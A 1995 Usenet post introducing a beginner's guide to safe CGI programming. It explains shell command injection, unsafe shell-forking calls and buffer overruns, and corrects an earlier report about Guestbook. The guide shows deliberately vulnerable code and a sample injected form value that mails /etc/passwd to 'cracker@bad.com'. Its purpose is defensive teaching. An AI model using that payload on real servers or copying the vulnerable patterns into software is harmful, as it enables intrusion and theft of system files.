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"Safe CGI" document plus correction re: Guestbook

In light of the recently uncovered holes in common CGI scripts, 
along with my suspicion that many more such holes lurk undiscovered
on the net, I have written an introductory document on safe CGI
programming.  It follows this message, and is also available at
<URL:http://www.primus.com/staff/paulp/cgi-security/>.  This URL
will serve as a starting point for CGI security information.

I also have a rather large correction to make.  The holes in AnyForm
and FormMail were real, but the hole in Guestbook was not present.
Guestbook is by the same author as FormMail, and when I saw a nearly
identical line to the one I had already confirmed in FormMail, I
incorrectly concluded the same hole existed.  It did not, and I apologize
for the misinformation.

The introductory document follows; comments appreciated.  Followups to
comp.infosystems.www.authoring.cgi, please.

Paul Phillips                                 | "Click _here_ if you do not
<URL:mailto:paulp@cerf.net>                   |  have a graphical browser"
<URL:http://www.primus.com/staff/paulp/>      |  -- Canter and Siegel, on
<URL:pots://+1-619-220-0850/is/paul/there?>   |  their short-lived web site

Safe CGI Programming                                        08/03/95

Recent exposure of security holes in several widely used CGI packages
indicates that the existing documents on CGI security have not taken
hold in the public consciousness.  These scripts are being redistributed
to people that have no programming experience and no way to determine
whether they are opening up their servers for attack.  This causes
considerable frustration for all involved.

This document is intended for the beginning or intermediate
CGI programmer.  It is by no means a comprehensive analysis of
the security risks -- its purpose is to help people avoid the
most common errors.  This document is available at


Please send comments to Paul Phillips <paulp@cerf.net>

Q: "Why should I care? The server runs as nobody, right? That means
you can't do anything dangerous, even if you break a CGI script."

A: Wrong.  Some of the actions that can be taken in various 
circumstances are:

 1) Mailing the password file to the attacker (unless shadowed)
 2) Mailing a map of the filesystem to the attacker
 3) Mailing system information from /etc to the attacker
 4) Starting a login server on a high port and telneting in
 5) Many denial of service attacks: massive filesytem finds,
 for example, or other resource consuming commands

Another problem is that some sites are running their webservers
as root.  I CANNOT EMPHASIZE ENOUGH HOW BAD THIS IS.  You are shooting
yourself in the foot.  Whatever problem inspired you to do this, you
must solve it in some other manner, or you *will* be compromised in
the future.

There is a program called "cgiwrap" <URL:http://www.umr.edu/~cgiwrap>
that runs CGI scripts under the UID of the person that owns them.  While
cgiwrap successfully overcomes some problems with CGI scripts, it also
exacerbates the effect of security holes.  If an attacker can execute
commands under the user UID, rm -rf ~ is only a few characters long,
and the user will lose everything.

Q: "Now I'm scared, maybe my code is buggy.  Can you show me some
examples of security holes?"

A: Now you're talking.  The entire philosophy can be summed up as
"Never trust input data." Most security holes are exploited by 
sending data to the script that the author of the script did not
anticipate.  Let's look at some examples.

Foo wants people to be able to send him email via the web.  She
has several different email addresses, so she encodes an element
specifying which one so she can easily change it later without 
having to change the script.  (She needs her sysadmin's permission
to install or change CGI scripts -- what a hassle!)

<INPUT TYPE="hidden" NAME="FooAddress" VALUE="foo@bar.baz.com">

Now she writes a script called "email-foo", and cajoles the sysadmin
into installing it.  A few weeks later, Foo's sysadmin calls her back: 
crackers have broken into the machine via Foo's script! Where did 
Foo go wrong?

Let's see Foo's mistake in three different languages.  Foo has
placed the data to be emailed in a tempfile and the FooAddress 
passed by the form into a variable.  


    system("/usr/lib/sendmail -t $foo_address < $input_file");


    sprintf(buffer, "/usr/lib/sendmail -t %s < %s", foo_address, input_file);

    system("/usr/lib/sendmail -t " + FooAddress + " < " + InputFile);

In all three cases, system is forking a shell.  Foo is unwisely 
assuming that people will only call this script from *her* form, so
the email address will always be one of hers.  But the cracker copied
the form to his own machine, and edited it so it looked like this:

<INPUT TYPE="hidden" NAME="FooAddress"
VALUE="foo@bar.baz.com;mail cracker@bad.com </etc/passwd">

Then he submitted it to Foo's machine, and the rest is history,
along with the machine.

Q: "I never use system.  I guess my scripts are all safe then!"

A: System is not the only command that forks a shell.  In Perl, 
you can invoke a shell by opening to a pipe, using backticks, or 
calling exec (in some cases.)

 * Opening to a pipe: open(OUT, "|program $args");
 * Backticks: `program $args`;
 * Exec: exec("program $args");

You can also get in trouble in Perl with the eval statement or
regular expression modifier /e (which calls eval.) That's beyond
the scope of this document, but be careful.

In C/C++, the popen(3) call also starts a shell.

 * popen("program", "w");

Q: "What's the right way to do it?"

A: Generally there are two answers: use the data only where it can't
hurt you, or check it to make sure it is safe.  

  open(MAIL, "/usr/lib/sendmail -t");
  print MAIL "To: $recipient\n";

Now the untrusted data is no longer being passed to the shell.  However,
it is being passed unchecked to sendmail.  In some sense you are trading
the shell problems for those of the program you are running externally,
so be sure that it cannot be tricked with the untrusted data!

  unless($recipient =~ /^[a-zA-Z_@]*$/) {
    # Print out some HTML here indicating failure

This time we're making sure the data is safe for passing to the
shell.  If you do this, make sure your regular expression checks
for all shell metacharacters.  This example regexp specifies what
is safe rather than what is unsafe.

For maximum security, use both methods.  

USE PERL TAINT CHECKS: Perl can be very helpful with these problems.
Invoke it with perl -T to force taint checks; to learn about taint
checks, see the perl man page.

Q: "What else?"

A: In C and C++, improperly allocated memory is vulnerable to 
buffer overruns.  Perl dynamically extends its data structures to 
prevent this.  Imagine code like this:

int foo() {
    char buffer[10];

    strcpy(buffer, get_form_var("feh"));
    /* etc */

When writing this code, the author certainly expected the value of
the feh variable to be less than 10 characters.  Unfortunately for
him, he didn't make sure, and it turned out to be much longer.  This
means that user data is overwriting the program stack, which in some
circumstances can be used to invoke commands.

This is very difficult to exploit and you probably will not encounter 
it.  Still, it's worth mentioning; a very similar hole was found in
NCSA httpd 1.3 earlier in 1995.  It is poor programming practice not to
check such things anyway.

Contributions to this document welcomed at <paulp@cerf.net>.